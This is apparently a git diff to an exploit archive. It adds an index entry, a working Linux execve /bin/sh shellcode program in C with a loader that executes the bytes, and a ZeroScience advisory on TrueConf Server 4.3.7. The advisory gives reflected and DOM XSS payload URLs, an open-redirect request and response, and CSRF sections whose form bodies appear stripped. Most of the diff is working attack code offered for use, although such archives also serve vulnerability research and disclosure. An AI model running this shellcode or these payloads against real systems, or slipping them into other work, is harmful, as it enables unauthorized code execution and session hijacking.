diff --git a/files.csv b/files.csv index 886e1f94e..df9a65dbf 100644 --- a/files.csv +++ b/files.csv @@ -15853,6 +15853,7 @@ id,file,description,date,author,platform,type,port 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 +41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -37114,3 +37115,4 @@ id,file,description,date,author,platform,type,port 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0 +41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0 diff --git a/platforms/linux/shellcode/41183.c b/platforms/linux/shellcode/41183.c new file mode 100755 index 000000000..57d4b0c2b --- /dev/null +++ b/platforms/linux/shellcode/41183.c @@ -0,0 +1,79 @@ +/** + Copyright © 2017 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. */ + +#include +#include +#include + +#include + +#define SHX_SIZE 37 + +char SHX[] = { + /* 0000 */ "\x31\xf6" /* xor esi, esi */ + /* 0002 */ "\xf7\xe6" /* mul esi */ + /* 0004 */ "\x52" /* push rdx */ + /* 0005 */ "\x52" /* push rdx */ + /* 0006 */ "\x52" /* push rdx */ + /* 0007 */ "\x54" /* push rsp */ + /* 0008 */ "\x5b" /* pop rbx */ + /* 0009 */ "\x53" /* push rbx */ + /* 000A */ "\x5f" /* pop rdi */ + /* 000B */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */ + /* 0011 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */ + /* 0018 */ "\x40\x75\x04" /* jnz 0x1f */ + /* 001B */ "\xb0\x3b" /* mov al, 0x3b */ + /* 001D */ "\x0f\x05" /* syscall */ + /* 001F */ "\x31\xc9" /* xor ecx, ecx */ + /* 0021 */ "\xb0\x0b" /* mov al, 0xb */ + /* 0023 */ "\xcd\x80" /* int 0x80 */ +}; + +void xcode(char *s, int len) +{ + void *bin; + + bin=mmap (0, len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); + + memcpy (bin, s, len); + + // execute + ((void(*)())bin)(); + + munmap (bin, len); +} + +int main(void) +{ + xcode (SHX, SHX_SIZE); + return 0; +} + diff --git a/platforms/php/webapps/41184.txt b/platforms/php/webapps/41184.txt new file mode 100755 index 000000000..11de71dc4 --- /dev/null +++ b/platforms/php/webapps/41184.txt @@ -0,0 +1,132 @@ +TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities + + +Vendor: TrueConf LLC +Product web page: https://www.trueconf.com +Affected version: 4.3.7.12255 and 4.3.7.12219 + +Summary: TrueConf Server is a powerful, high-quality and highly secured +video conferencing software server. It is specially designed to work with +up to 250 participants in a multipoint conference over LAN or VPN networks. +TrueConf Server requires no hardware and includes client applications for +all popular platforms, making it an easy-to-set up, unified communications +solution. + +Desc: The administration interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Input passed via the 'redirect_url' GET parameter is not properly verified before +being used to redirect users. This can be exploited to redirect a user to an +arbitrary website e.g. when a user clicks a specially crafted link to the affected +script hosted on a trusted domain. + +TrueConf also suffers from multiple stored, reflected and DOM XSS issues when +input passed via several parameters to several scripts is not properly sanitized +before being returned to the user. This can be exploited to execute arbitrary HTML +and script code in a user's browser session in context of an affected site. + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Apache/2.4.17 (Win32) + PHP/5.4.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5393 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php + + +01.11.2016 + +-- + + +CSRF Stored XSS: +---------------- + + + +
+ + + + + + + + + + + + + + + + +
+ + + + + +Reflected XSS: +-------------- + +http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]= +http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25
prompt(251) +http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name +http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ? + + + +DOM XSS: +-------- + +http://127.0.0.1:8888/admin/group?'\> +http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"> + + + +Open Redirect: +-------------- + +Request: + +GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1 +Host: 127.0.0.1:8888 +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 +Accept: */* + +Response: + +HTTP/1.1 302 Found +Date: Thu, 22 Sep 2016 21:15:40 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: http://www.zeroscience.mk +Content-Length: 0 +Keep-Alive: timeout=5, max=75 +Connection: Keep-Alive +Content-Type: text/html; charset=utf-8 + + + +CSRF Stop Web Service: +---------------------- + + + +
+ +
+ +